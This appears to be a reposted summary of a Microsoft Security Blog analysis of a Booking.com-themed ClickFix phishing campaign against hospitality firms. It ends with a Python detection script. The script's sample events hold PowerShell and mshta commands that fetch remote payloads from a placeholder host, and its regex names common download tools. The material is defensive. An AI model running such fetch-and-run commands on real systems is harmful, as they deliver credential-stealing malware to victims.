Microsoft Security Blog: Phishing campaign impersonates Booking .com, delivers a suite of credential-stealing malware

Source URL: https://www.microsoft.com/en-us/security/blog/2025/03/13/phishing-campaign-impersonates-booking-com-delivers-a-suite-of-credential-stealing-malware/
Source: Microsoft Security Blog
Title: Phishing campaign impersonates Booking .com, delivers a suite of credential-stealing malware

Feedly Summary: Starting in December 2024, leading up to some of the busiest travel days, Microsoft Threat Intelligence identified a phishing campaign that impersonates online travel agency Booking.com and targets organizations in the hospitality industry. The campaign uses a social engineering technique called ClickFix to deliver multiple credential-stealing malware in order to conduct financial fraud and theft. […]
The post Phishing campaign impersonates Booking .com, delivers a suite of credential-stealing malware appeared first on Microsoft Security Blog.

AI Summary and Description: Yes

**Summary:** The text provides a detailed analysis of a phishing campaign identified by Microsoft Threat Intelligence. It specifically targets the hospitality industry by impersonating Booking.com and utilizes sophisticated social engineering techniques like ClickFix to deliver malware. This campaign’s evolution and the specific tactics employed underscore a growing threat landscape, particularly signaling a need for improved security awareness and layered defenses within organizations.

**Detailed Description:**
The provided text outlines a phishing campaign, tracked as Storm-1865, that targets the hospitality sector, particularly users likely to deal with Booking.com. Rather than exploiting a software vulnerability, the campaign relies on the ClickFix social engineering technique to trick individuals into running commands that download multiple types of credential-stealing malware.

Key points include:

– **Phishing Campaign Details:**
  – **Target:** Organizations in the hospitality sector, with a focus on North America, Oceania, and Europe.
  – **Methodology:** The ClickFix tactic presents fake error messages that prompt users to execute attacker-supplied commands themselves.

– **Impact of ClickFix:**
  – Users are tricked into using Windows features (e.g., the Run dialog) to execute commands that download malware.
  – Because the user performs the action, the lure does not depend on an exploit and can slip past automated security controls, which highlights the need for user education and proactive security controls.

– **Malware Varieties:** The campaign distributes several malware families (e.g., XWorm, Lumma stealer, VenomRAT) capable of stealing financial and personal information, reflecting the campaign’s malicious intent.

– **Historical Context:** The campaign has been active, and increasingly aggressive, since early 2023, adapting its techniques to evade detection.

– **Recommendations for Organizations:**
  – Educate users on recognizing phishing attempts and verifying legitimate email communications.
  – Implement security measures such as multi-factor authentication (MFA), phishing-resistant authentication methods, and advanced threat protection solutions like Microsoft Defender for Office 365.

– **Mitigation Techniques:**
  – Use tools such as Microsoft Defender for Endpoint and Microsoft Defender for Office 365 to improve detection and response capabilities.
  – Best practices include scrutinizing sender information, treating urgent calls to action (typical of phishing campaigns) with suspicion, and continuous user training to identify potential threats.

– **Indicators of Compromise (IoCs):**
  – Specific IP addresses and malware hashes are listed throughout the original post and can be used for threat hunting and infrastructure protection.
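The ClickFix pattern summarized above, where a victim pastes a command into the Windows Run dialog, leaves a recognizable trace in process-creation telemetry: a script interpreter launched directly by explorer.exe with a command line that reaches out to a remote resource. The following detection logic is an added example, not code from the Microsoft post; it runs over constructed Sysmon-style events, and the interpreter list and download cues are assumptions to tune for your own fleet.

```python
"""Flag process-creation events that match the ClickFix pattern (added example)."""
import re
from dataclasses import dataclass

# Interpreters commonly used to run a pasted one-liner (assumption: tune for your environment).
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe", "cscript.exe"}

# Command-line cues that suggest a remote payload fetch (assumption: extend with your own rules).
DOWNLOAD_CUES = re.compile(
    r"https?://|invoke-webrequest|\biwr\b|downloadstring|\bcurl\b|\bbitsadmin\b|\bcertutil\b",
    re.IGNORECASE,
)


@dataclass
class ProcEvent:
    parent_image: str   # full path of the parent process
    image: str          # full path of the created process
    command_line: str   # command line of the created process


def _basename(path: str) -> str:
    """Return the lower-cased file name from a Windows path."""
    return path.lower().rsplit("\\", 1)[-1]


def is_clickfix_like(ev: ProcEvent) -> bool:
    """True when explorer.exe (the parent of anything started via the Run dialog)
    spawns a script interpreter whose command line references a remote resource."""
    return (
        _basename(ev.parent_image) == "explorer.exe"
        and _basename(ev.image) in INTERPRETERS
        and DOWNLOAD_CUES.search(ev.command_line) is not None
    )


def find_suspicious(events):
    """Return the subset of events that match the ClickFix-like pattern."""
    return [ev for ev in events if is_clickfix_like(ev)]


# Constructed sample events; hosts and paths are placeholders, not campaign indicators.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell -NoProfile -Command "Invoke-WebRequest http://placeholder.invalid/x"'),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe", "notepad.exe"),
    ProcEvent(r"C:\Program Files\Editor\editor.exe", r"C:\Windows\System32\cmd.exe", "cmd /c dir"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
              "mshta https://placeholder.invalid/page.hta"),
]

if __name__ == "__main__":
    for ev in find_suspicious(SAMPLE_EVENTS):
        print("ALERT:", ev.command_line)
```

In production the same predicate can be expressed as a Sigma or KQL rule over Sysmon Event ID 1 or Defender for Endpoint process events; the RunMRU registry key also records what was typed into the Run dialog and is useful corroboration during triage.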

The information outlined in this analysis is crucial for security and compliance professionals looking to defend against evolving phishing schemes and enhance their organization’s overall security posture. By understanding these techniques and deploying the recommended strategies, organizations can better safeguard sensitive information and reduce the risk of financial fraud.